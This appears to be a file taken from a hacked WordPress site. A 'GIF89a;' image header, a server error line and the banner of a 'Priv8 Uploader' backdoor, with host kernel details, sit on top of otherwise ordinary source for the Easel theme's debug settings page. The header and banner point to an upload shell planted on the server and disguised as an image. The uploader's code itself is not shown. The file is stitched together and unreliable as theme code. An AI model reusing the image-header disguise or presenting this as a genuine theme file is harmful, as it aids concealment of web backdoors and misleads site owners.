GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<div id="easel-debug">
<div class="easel-options">
<form method="post" id="myForm-debug" enctype="multipart/form-data" action="?page=easel-options">
<?php wp_nonce_field('update-options') ?>
<table class="widefat">
<thead>
<tr>
<th colspan="3"><?php _e('Debug','easel'); ?></th>
</tr>
</thead>
<tr class="alternate">
<th scope="row"><label for="enable_debug_footer_code"><?php _e('Enable the debug page load/memory usage at the bottom of each page?','easel'); ?></label></th>
<td>
<input id="enable_debug_footer_code" name="enable_debug_footer_code" type="checkbox" value="1" <?php checked(true, $easel_options['enable_debug_footer_code']); ?> />
</td>
<td>
<?php _e('If enabled will show information on how many queries, memory is used as well as how fast the page loads.','easel'); ?>
</td>
</tr>
<tr>
<th scope="row"><label for="force_active_connection_close"><?php _e('Force MySQL to close the current active connection after page load?','easel'); ?></label></th>
<td>
<input id="force_active_connection_close" name="force_active_connection_close" type="checkbox" value="1" <?php checked(true, $easel_options['force_active_connection_close']); ?> />
</td>
<td>
<?php _e('This option forces mysql to close the connection after each page load - not recommended unless you are requested to enable it.','easel'); ?>
</td>
</tr>
</table>
<div class="easel-options-save">
<div class="easel-major-publishing-actions">
<div class="easel-publishing-action">
<input name="easel_save_debug" type="submit" class="button-primary" value="Save Settings" />
<input type="hidden" name="action" value="easel_save_debug" />
</div>
<div class="clear"></div>
</div>
</div>
</form>
<table class="widefat" style="width: 100%">
<tr>
<td colspan="5">
Technical Support is available on the forums at <a href="http://comicpress.net/forum" target="_blank">ComicPress/Frumph.NET forums</a>
</td>
<tr>
<td>
<strong>Site URL</strong>:(siteurl) <?php echo easel_themeinfo('siteurl'); ?><br />
<strong>Blog URL</strong>:(home) <?php echo easel_themeinfo('home'); ?><br />
<br />
<table class="widefat">
<?php
$variable_dump = easel_themeinfo();
if (is_array($variable_dump)) {
while (list($key, $value) = each($variable_dump)) { ?>
<tr>
<td> <?php var_dump($key); ?></td>
<td> <?php var_dump($value); ?></td>
</tr>
<?php }
}
?>
</table>
</td>
</tr>
</table>
</div>
</div>